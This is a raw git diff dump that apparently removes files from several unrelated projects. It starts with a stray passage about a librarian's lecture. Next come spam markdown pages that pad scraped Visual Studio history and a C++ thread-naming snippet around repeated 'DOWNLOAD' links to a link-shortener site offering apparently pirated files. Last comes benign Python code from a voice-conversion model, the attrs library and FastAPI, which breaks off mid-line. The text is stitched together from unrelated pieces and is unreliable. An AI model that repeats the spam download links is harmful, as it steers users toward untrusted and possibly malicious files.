For a man who lives off the order of things, in this case his books, writing a lecture and losing it is the perfect slip, one that allows him a digression that points toward talking about himself. The subject of the lecture is really a pretext; our librarian needs to talk about what rains inside him more than about the rain itself.

    -
    -
    \ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/Download Android For Visual Studio 2010 Everything You Need to Know.md b/spaces/cihyFjudo/fairness-paper-search/Download Android For Visual Studio 2010 Everything You Need to Know.md deleted file mode 100644 index 9550a4a1392bde21c21668690220024c5132e09c..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Download Android For Visual Studio 2010 Everything You Need to Know.md +++ /dev/null @@ -1,10 +0,0 @@ -
    -

The Visual Studio Debugger includes features that make debugging multi-threaded applications easier. In debugging mode, the Threads window lists all threads, and hovering over a thread displays its stack trace in a tooltip.[148] Threads can be named and flagged directly from that window for easier identification.[149] In addition, the code window marks not only the currently executing instruction in the current thread but also the instructions currently executing in other threads.[149][150] The Visual Studio debugger supports integrated debugging of the .NET 3.5 Framework Base Class Library (BCL): it can dynamically download the BCL source code and debug symbols and allow stepping into the BCL source during debugging.[151] As of 2010, only a limited subset of the BCL source is available, with more library support planned for later.
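For native C++ code, the names shown in that Threads window can also be set from the program itself. Below is a minimal sketch of the documented MSVC-only technique of raising the special 0x406D1388 exception that the debugger intercepts; the helper name SetThreadName and the example name "worker-0" are illustrative only:

```cpp
#include <windows.h>

const DWORD MS_VC_EXCEPTION = 0x406D1388;

#pragma pack(push, 8)
typedef struct tagTHREADNAME_INFO {
    DWORD  dwType;     // must be 0x1000
    LPCSTR szName;     // pointer to the name (in user address space)
    DWORD  dwThreadID; // thread ID (-1 means the calling thread)
    DWORD  dwFlags;    // reserved, must be zero
} THREADNAME_INFO;
#pragma pack(pop)

// Tells an attached Visual Studio debugger the friendly name of a thread.
void SetThreadName(DWORD dwThreadID, const char* threadName) {
    THREADNAME_INFO info;
    info.dwType = 0x1000;
    info.szName = threadName;
    info.dwThreadID = dwThreadID;
    info.dwFlags = 0;
    __try {
        RaiseException(MS_VC_EXCEPTION, 0,
                       sizeof(info) / sizeof(ULONG_PTR),
                       reinterpret_cast<ULONG_PTR*>(&info));
    } __except (EXCEPTION_EXECUTE_HANDLER) {
        // The debugger consumes the exception; nothing to do here.
    }
}

// Usage (hypothetical): SetThreadName(GetCurrentThreadId(), "worker-0");
```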

    -

    Download Android For Visual Studio 2010


    DOWNLOAD ✑ ✑ ✑ https://tinurli.com/2uwkMc



    -

Visual Studio 2010 comes with .NET Framework 4 and supports developing applications targeting Windows 7.[154] It supports IBM Db2 and Oracle databases, in addition to Microsoft SQL Server.[154] It has integrated support for developing Microsoft Silverlight applications, including an interactive designer.[154] Visual Studio 2010 offers several tools to make parallel programming simpler: in addition to the Parallel Extensions for the .NET Framework and the Parallel Patterns Library for native code, Visual Studio 2010 includes tools for debugging parallel applications. The new tools allow the visualization of parallel Tasks and their runtime stacks.[157] Tools for profiling parallel applications can be used for visualization of thread wait-times and thread migrations across processor cores.[158] Intel and Microsoft have jointly pledged support for a new Concurrency Runtime in Visual Studio 2010,[159] and Intel has launched parallelism support in Parallel Studio as an add-on for Visual Studio.[160]
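As a rough illustration of the native-code side mentioned above, the Parallel Patterns Library that ships with the Concurrency Runtime exposes algorithms such as Concurrency::parallel_for. A minimal sketch, assuming MSVC with ppl.h available (the vector size and the squaring loop body are made up for the example):

```cpp
#include <ppl.h>
#include <vector>
#include <iostream>

int main() {
    std::vector<int> data(1000, 1);

    // Run the loop body on the Concurrency Runtime's scheduler;
    // iterations may execute in parallel across processor cores.
    Concurrency::parallel_for(0, static_cast<int>(data.size()), [&](int i) {
        data[i] = i * i;  // each iteration touches a distinct element
    });

    std::cout << data[10] << std::endl;  // prints 100
    return 0;
}
```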

    -

    Visual Studio 2010 features a new Help System replacing the MSDN Library viewer. The Help System is no longer based on Microsoft Help 2 and does not use Microsoft Document Explorer. Dynamic help containing links to help items based on what the developer was doing at the time was removed in the final release,[163] but can be added back using a download from Microsoft.[164]

    -

The final release of Visual Studio 2013 became available for download on October 17, 2013, along with .NET 4.5.1.[190] Visual Studio 2013 officially launched on November 13, 2013, at a virtual launch event keynoted by S. Somasegar and hosted on events.visualstudio.com.[191] "Visual Studio 2013 Update 1" (Visual Studio 2013.1) was released on January 20, 2014.[192] Visual Studio 2013.1 is a targeted update that addresses some key areas of customer feedback.[193] "Visual Studio 2013 Update 2" (Visual Studio 2013.2) was released on May 12, 2014.[194] Visual Studio 2013 Update 3 was released on August 4, 2014. With this update, Visual Studio provides an option to disable the all-caps menus, which was introduced in VS2012.[195] "Visual Studio 2013 Update 4" (Visual Studio 2013.4) was released on November 12, 2014.[196] "Visual Studio 2013 Update 5" (Visual Studio 2013.5) was released on July 20, 2015.[197]

    -

    Downloading Microsoft Visual Studio 2010 10.0.40219.1 from the developer's website was possible when we last checked. We cannot confirm if there is a free download of this software available. The actual developer of the software is Microsoft.

    -

    -
    -
    \ No newline at end of file diff --git a/spaces/cihyFjudo/fairness-paper-search/Using Computers In The Medical Office Microsoft Word Excel And Powerpoint 2013 Download.zip BEST.md b/spaces/cihyFjudo/fairness-paper-search/Using Computers In The Medical Office Microsoft Word Excel And Powerpoint 2013 Download.zip BEST.md deleted file mode 100644 index 713498733cf4b0ac2cf1fa6fd4a5c927925f12e2..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Using Computers In The Medical Office Microsoft Word Excel And Powerpoint 2013 Download.zip BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Using Computers In The Medical Office: Microsoft Word Excel And Powerpoint 2013 Download.zip


    Download File ····· https://tinurli.com/2uwjpE



    -
-
    -
    -
    -

    diff --git a/spaces/cleanmaster/so-vits-svc-akagi/model_onnx.py b/spaces/cleanmaster/so-vits-svc-akagi/model_onnx.py deleted file mode 100644 index eaae733358b3b3b33dfb6ab2a797d82b99a53747..0000000000000000000000000000000000000000 --- a/spaces/cleanmaster/so-vits-svc-akagi/model_onnx.py +++ /dev/null @@ -1,328 +0,0 @@ -import copy -import math -import torch -from torch import nn -from torch.nn import functional as F - -import attentions -import commons -import modules - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from commons import init_weights, get_padding -from vdecoder.hifigan.models import Generator -from utils import f0_to_coarse - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append(modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - # print(x.shape,x_lengths.shape) - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - filter_channels=None, - n_heads=None, - p_dropout=None): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - self.f0_emb = nn.Embedding(256, hidden_channels) - - self.enc_ = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - - def forward(self, x, x_lengths, f0=None): - 
x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = x + self.f0_emb(f0.long()).transpose(1,2) - x = self.enc_(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - - return z, m, logs, x_mask - - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2,3,5,7,11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class SpeakerEncoder(torch.nn.Module): - def __init__(self, mel_n_channels=80, model_num_layers=3, model_hidden_size=256, model_embedding_size=256): - super(SpeakerEncoder, self).__init__() - self.lstm = nn.LSTM(mel_n_channels, model_hidden_size, model_num_layers, 
batch_first=True) - self.linear = nn.Linear(model_hidden_size, model_embedding_size) - self.relu = nn.ReLU() - - def forward(self, mels): - self.lstm.flatten_parameters() - _, (hidden, _) = self.lstm(mels) - embeds_raw = self.relu(self.linear(hidden[-1])) - return embeds_raw / torch.norm(embeds_raw, dim=1, keepdim=True) - - def compute_partial_slices(self, total_frames, partial_frames, partial_hop): - mel_slices = [] - for i in range(0, total_frames-partial_frames, partial_hop): - mel_range = torch.arange(i, i+partial_frames) - mel_slices.append(mel_range) - - return mel_slices - - def embed_utterance(self, mel, partial_frames=128, partial_hop=64): - mel_len = mel.size(1) - last_mel = mel[:,-partial_frames:] - - if mel_len > partial_frames: - mel_slices = self.compute_partial_slices(mel_len, partial_frames, partial_hop) - mels = list(mel[:,s] for s in mel_slices) - mels.append(last_mel) - mels = torch.stack(tuple(mels), 0).squeeze(1) - - with torch.no_grad(): - partial_embeds = self(mels) - embed = torch.mean(partial_embeds, axis=0).unsqueeze(0) - #embed = embed / torch.linalg.norm(embed, 2) - else: - with torch.no_grad(): - embed = self(last_mel) - - return embed - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - ssl_dim, - n_speakers, - **kwargs): - - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - self.ssl_dim = ssl_dim - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - self.enc_p_ = TextEncoder(ssl_dim, inter_channels, hidden_channels, 5, 1, 16,0, filter_channels, n_heads, p_dropout) - hps = { - "sampling_rate": 32000, - "inter_channels": 192, - "resblock": "1", - "resblock_kernel_sizes": [3, 7, 11], - "resblock_dilation_sizes": [[1, 3, 5], [1, 3, 5], [1, 3, 5]], - "upsample_rates": [10, 8, 2, 2], - "upsample_initial_channel": 512, - "upsample_kernel_sizes": [16, 16, 4, 4], - "gin_channels": 256, - } - self.dec = Generator(h=hps) - self.enc_q = Encoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - - def forward(self, c, c_lengths, f0, g=None): - g = self.emb_g(g.unsqueeze(0)).transpose(1,2) - z_p, m_p, logs_p, c_mask = self.enc_p_(c.transpose(1,2), c_lengths, f0=f0_to_coarse(f0)) - z = self.flow(z_p, c_mask, g=g, reverse=True) - o = self.dec(z * c_mask, g=g, f0=f0.float()) - return o - diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/attr/_funcs.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/attr/_funcs.py deleted file mode 100644 index 
7f5d9610f3cf0010a9185579f7188df5ff609384..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/attr/_funcs.py +++ /dev/null @@ -1,477 +0,0 @@ -# SPDX-License-Identifier: MIT - - -import copy - -from ._compat import PY_3_9_PLUS, get_generic_base -from ._make import NOTHING, _obj_setattr, fields -from .exceptions import AttrsAttributeNotFoundError - - -def asdict( - inst, - recurse=True, - filter=None, - dict_factory=dict, - retain_collection_types=False, - value_serializer=None, -): - """ - Return the *attrs* attribute values of *inst* as a dict. - - Optionally recurse into other *attrs*-decorated classes. - - :param inst: Instance of an *attrs*-decorated class. - :param bool recurse: Recurse into classes that are also - *attrs*-decorated. - :param callable filter: A callable whose return code determines whether an - attribute or element is included (``True``) or dropped (``False``). Is - called with the `attrs.Attribute` as the first argument and the - value as the second argument. - :param callable dict_factory: A callable to produce dictionaries from. For - example, to produce ordered dictionaries instead of normal Python - dictionaries, pass in ``collections.OrderedDict``. - :param bool retain_collection_types: Do not convert to ``list`` when - encountering an attribute whose type is ``tuple`` or ``set``. Only - meaningful if ``recurse`` is ``True``. - :param Optional[callable] value_serializer: A hook that is called for every - attribute or dict key/value. It receives the current instance, field - and value and must return the (updated) value. The hook is run *after* - the optional *filter* has been applied. - - :rtype: return type of *dict_factory* - - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. versionadded:: 16.0.0 *dict_factory* - .. versionadded:: 16.1.0 *retain_collection_types* - .. versionadded:: 20.3.0 *value_serializer* - .. versionadded:: 21.3.0 If a dict has a collection for a key, it is - serialized as a tuple. 
- """ - attrs = fields(inst.__class__) - rv = dict_factory() - for a in attrs: - v = getattr(inst, a.name) - if filter is not None and not filter(a, v): - continue - - if value_serializer is not None: - v = value_serializer(inst, a, v) - - if recurse is True: - if has(v.__class__): - rv[a.name] = asdict( - v, - recurse=True, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - elif isinstance(v, (tuple, list, set, frozenset)): - cf = v.__class__ if retain_collection_types is True else list - rv[a.name] = cf( - [ - _asdict_anything( - i, - is_key=False, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - for i in v - ] - ) - elif isinstance(v, dict): - df = dict_factory - rv[a.name] = df( - ( - _asdict_anything( - kk, - is_key=True, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - _asdict_anything( - vv, - is_key=False, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - ) - for kk, vv in v.items() - ) - else: - rv[a.name] = v - else: - rv[a.name] = v - return rv - - -def _asdict_anything( - val, - is_key, - filter, - dict_factory, - retain_collection_types, - value_serializer, -): - """ - ``asdict`` only works on attrs instances, this works on anything. - """ - if getattr(val.__class__, "__attrs_attrs__", None) is not None: - # Attrs class. - rv = asdict( - val, - recurse=True, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - elif isinstance(val, (tuple, list, set, frozenset)): - if retain_collection_types is True: - cf = val.__class__ - elif is_key: - cf = tuple - else: - cf = list - - rv = cf( - [ - _asdict_anything( - i, - is_key=False, - filter=filter, - dict_factory=dict_factory, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ) - for i in val - ] - ) - elif isinstance(val, dict): - df = dict_factory - rv = df( - ( - _asdict_anything( - kk, - is_key=True, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - _asdict_anything( - vv, - is_key=False, - filter=filter, - dict_factory=df, - retain_collection_types=retain_collection_types, - value_serializer=value_serializer, - ), - ) - for kk, vv in val.items() - ) - else: - rv = val - if value_serializer is not None: - rv = value_serializer(None, None, rv) - - return rv - - -def astuple( - inst, - recurse=True, - filter=None, - tuple_factory=tuple, - retain_collection_types=False, -): - """ - Return the *attrs* attribute values of *inst* as a tuple. - - Optionally recurse into other *attrs*-decorated classes. - - :param inst: Instance of an *attrs*-decorated class. - :param bool recurse: Recurse into classes that are also - *attrs*-decorated. - :param callable filter: A callable whose return code determines whether an - attribute or element is included (``True``) or dropped (``False``). Is - called with the `attrs.Attribute` as the first argument and the - value as the second argument. - :param callable tuple_factory: A callable to produce tuples from. For - example, to produce lists instead of tuples. 
- :param bool retain_collection_types: Do not convert to ``list`` - or ``dict`` when encountering an attribute which type is - ``tuple``, ``dict`` or ``set``. Only meaningful if ``recurse`` is - ``True``. - - :rtype: return type of *tuple_factory* - - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. versionadded:: 16.2.0 - """ - attrs = fields(inst.__class__) - rv = [] - retain = retain_collection_types # Very long. :/ - for a in attrs: - v = getattr(inst, a.name) - if filter is not None and not filter(a, v): - continue - if recurse is True: - if has(v.__class__): - rv.append( - astuple( - v, - recurse=True, - filter=filter, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - ) - elif isinstance(v, (tuple, list, set, frozenset)): - cf = v.__class__ if retain is True else list - rv.append( - cf( - [ - astuple( - j, - recurse=True, - filter=filter, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - if has(j.__class__) - else j - for j in v - ] - ) - ) - elif isinstance(v, dict): - df = v.__class__ if retain is True else dict - rv.append( - df( - ( - astuple( - kk, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - if has(kk.__class__) - else kk, - astuple( - vv, - tuple_factory=tuple_factory, - retain_collection_types=retain, - ) - if has(vv.__class__) - else vv, - ) - for kk, vv in v.items() - ) - ) - else: - rv.append(v) - else: - rv.append(v) - - return rv if tuple_factory is list else tuple_factory(rv) - - -def has(cls): - """ - Check whether *cls* is a class with *attrs* attributes. - - :param type cls: Class to introspect. - :raise TypeError: If *cls* is not a class. - - :rtype: bool - """ - attrs = getattr(cls, "__attrs_attrs__", None) - if attrs is not None: - return True - - # No attrs, maybe it's a specialized generic (A[str])? - generic_base = get_generic_base(cls) - if generic_base is not None: - generic_attrs = getattr(generic_base, "__attrs_attrs__", None) - if generic_attrs is not None: - # Stick it on here for speed next time. - cls.__attrs_attrs__ = generic_attrs - return generic_attrs is not None - return False - - -def assoc(inst, **changes): - """ - Copy *inst* and apply *changes*. - - This is different from `evolve` that applies the changes to the arguments - that create the new instance. - - `evolve`'s behavior is preferable, but there are `edge cases`_ where it - doesn't work. Therefore `assoc` is deprecated, but will not be removed. - - .. _`edge cases`: https://github.com/python-attrs/attrs/issues/251 - - :param inst: Instance of a class with *attrs* attributes. - :param changes: Keyword changes in the new copy. - - :return: A copy of inst with *changes* incorporated. - - :raise attrs.exceptions.AttrsAttributeNotFoundError: If *attr_name* - couldn't be found on *cls*. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. deprecated:: 17.1.0 - Use `attrs.evolve` instead if you can. - This function will not be removed du to the slightly different approach - compared to `attrs.evolve`. - """ - new = copy.copy(inst) - attrs = fields(inst.__class__) - for k, v in changes.items(): - a = getattr(attrs, k, NOTHING) - if a is NOTHING: - raise AttrsAttributeNotFoundError( - f"{k} is not an attrs attribute on {new.__class__}." - ) - _obj_setattr(new, k, v) - return new - - -def evolve(*args, **changes): - """ - Create a new instance, based on the first positional argument with - *changes* applied. 
- - :param inst: Instance of a class with *attrs* attributes. - :param changes: Keyword changes in the new copy. - - :return: A copy of inst with *changes* incorporated. - - :raise TypeError: If *attr_name* couldn't be found in the class - ``__init__``. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - .. versionadded:: 17.1.0 - .. deprecated:: 23.1.0 - It is now deprecated to pass the instance using the keyword argument - *inst*. It will raise a warning until at least April 2024, after which - it will become an error. Always pass the instance as a positional - argument. - """ - # Try to get instance by positional argument first. - # Use changes otherwise and warn it'll break. - if args: - try: - (inst,) = args - except ValueError: - raise TypeError( - f"evolve() takes 1 positional argument, but {len(args)} " - "were given" - ) from None - else: - try: - inst = changes.pop("inst") - except KeyError: - raise TypeError( - "evolve() missing 1 required positional argument: 'inst'" - ) from None - - import warnings - - warnings.warn( - "Passing the instance per keyword argument is deprecated and " - "will stop working in, or after, April 2024.", - DeprecationWarning, - stacklevel=2, - ) - - cls = inst.__class__ - attrs = fields(cls) - for a in attrs: - if not a.init: - continue - attr_name = a.name # To deal with private attributes. - init_name = a.alias - if init_name not in changes: - changes[init_name] = getattr(inst, attr_name) - - return cls(**changes) - - -def resolve_types( - cls, globalns=None, localns=None, attribs=None, include_extras=True -): - """ - Resolve any strings and forward annotations in type annotations. - - This is only required if you need concrete types in `Attribute`'s *type* - field. In other words, you don't need to resolve your types if you only - use them for static type checking. - - With no arguments, names will be looked up in the module in which the class - was created. If this is not what you want, e.g. if the name only exists - inside a method, you may pass *globalns* or *localns* to specify other - dictionaries in which to look up these names. See the docs of - `typing.get_type_hints` for more details. - - :param type cls: Class to resolve. - :param Optional[dict] globalns: Dictionary containing global variables. - :param Optional[dict] localns: Dictionary containing local variables. - :param Optional[list] attribs: List of attribs for the given class. - This is necessary when calling from inside a ``field_transformer`` - since *cls* is not an *attrs* class yet. - :param bool include_extras: Resolve more accurately, if possible. - Pass ``include_extras`` to ``typing.get_hints``, if supported by the - typing module. On supported Python versions (3.9+), this resolves the - types more accurately. - - :raise TypeError: If *cls* is not a class. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class and you didn't pass any attribs. - :raise NameError: If types cannot be resolved because of missing variables. - - :returns: *cls* so you can use this function also as a class decorator. - Please note that you have to apply it **after** `attrs.define`. That - means the decorator has to come in the line **before** `attrs.define`. - - .. versionadded:: 20.1.0 - .. versionadded:: 21.1.0 *attribs* - .. versionadded:: 23.1.0 *include_extras* - - """ - # Since calling get_type_hints is expensive we cache whether we've - # done it already. 
- if getattr(cls, "__attrs_types_resolved__", None) != cls: - import typing - - kwargs = {"globalns": globalns, "localns": localns} - - if PY_3_9_PLUS: - kwargs["include_extras"] = include_extras - - hints = typing.get_type_hints(cls, **kwargs) - for field in fields(cls) if attribs is None else attribs: - if field.name in hints: - # Since fields have been frozen we must work around it. - _obj_setattr(field, "type", hints[field.name]) - # We store the class we resolved so that subclasses know they haven't - # been resolved. - cls.__attrs_types_resolved__ = cls - - # Return the class so you can use it as a decorator too. - return cls diff --git a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/routing.py b/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/routing.py deleted file mode 100644 index 6efd40ff3bc9fefa964be83d44e10bc60b193fb0..0000000000000000000000000000000000000000 --- a/spaces/cloudtheboi/Lofi4All/.pythonlibs/lib/python3.10/site-packages/fastapi/routing.py +++ /dev/null @@ -1,1356 +0,0 @@ -import asyncio -import dataclasses -import email.message -import inspect -import json -from contextlib import AsyncExitStack -from enum import Enum, IntEnum -from typing import ( - Any, - Callable, - Coroutine, - Dict, - List, - Optional, - Sequence, - Set, - Tuple, - Type, - Union, -) - -from fastapi import params -from fastapi._compat import ( - ModelField, - Undefined, - _get_model_config, - _model_dump, - _normalize_errors, - lenient_issubclass, -) -from fastapi.datastructures import Default, DefaultPlaceholder -from fastapi.dependencies.models import Dependant -from fastapi.dependencies.utils import ( - get_body_field, - get_dependant, - get_parameterless_sub_dependant, - get_typed_return_annotation, - solve_dependencies, -) -from fastapi.encoders import jsonable_encoder -from fastapi.exceptions import ( - FastAPIError, - RequestValidationError, - ResponseValidationError, - WebSocketRequestValidationError, -) -from fastapi.types import DecoratedCallable, IncEx -from fastapi.utils import ( - create_cloned_field, - create_response_field, - generate_unique_id, - get_value_or_default, - is_body_allowed_for_status_code, -) -from pydantic import BaseModel -from starlette import routing -from starlette.concurrency import run_in_threadpool -from starlette.exceptions import HTTPException -from starlette.requests import Request -from starlette.responses import JSONResponse, Response -from starlette.routing import ( - BaseRoute, - Match, - compile_path, - get_name, - request_response, - websocket_session, -) -from starlette.routing import Mount as Mount # noqa -from starlette.types import ASGIApp, Lifespan, Scope -from starlette.websockets import WebSocket - - -def _prepare_response_content( - res: Any, - *, - exclude_unset: bool, - exclude_defaults: bool = False, - exclude_none: bool = False, -) -> Any: - if isinstance(res, BaseModel): - read_with_orm_mode = getattr(_get_model_config(res), "read_with_orm_mode", None) - if read_with_orm_mode: - # Let from_orm extract the data from this model instead of converting - # it now to a dict. - # Otherwise there's no way to extract lazy data that requires attribute - # access instead of dict iteration, e.g. lazy relationships. 
- return res - return _model_dump( - res, - by_alias=True, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - elif isinstance(res, list): - return [ - _prepare_response_content( - item, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - for item in res - ] - elif isinstance(res, dict): - return { - k: _prepare_response_content( - v, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - for k, v in res.items() - } - elif dataclasses.is_dataclass(res): - return dataclasses.asdict(res) - return res - - -async def serialize_response( - *, - field: Optional[ModelField] = None, - response_content: Any, - include: Optional[IncEx] = None, - exclude: Optional[IncEx] = None, - by_alias: bool = True, - exclude_unset: bool = False, - exclude_defaults: bool = False, - exclude_none: bool = False, - is_coroutine: bool = True, -) -> Any: - if field: - errors = [] - if not hasattr(field, "serialize"): - # pydantic v1 - response_content = _prepare_response_content( - response_content, - exclude_unset=exclude_unset, - exclude_defaults=exclude_defaults, - exclude_none=exclude_none, - ) - if is_coroutine: - value, errors_ = field.validate(response_content, {}, loc=("response",)) - else: - value, errors_ = await 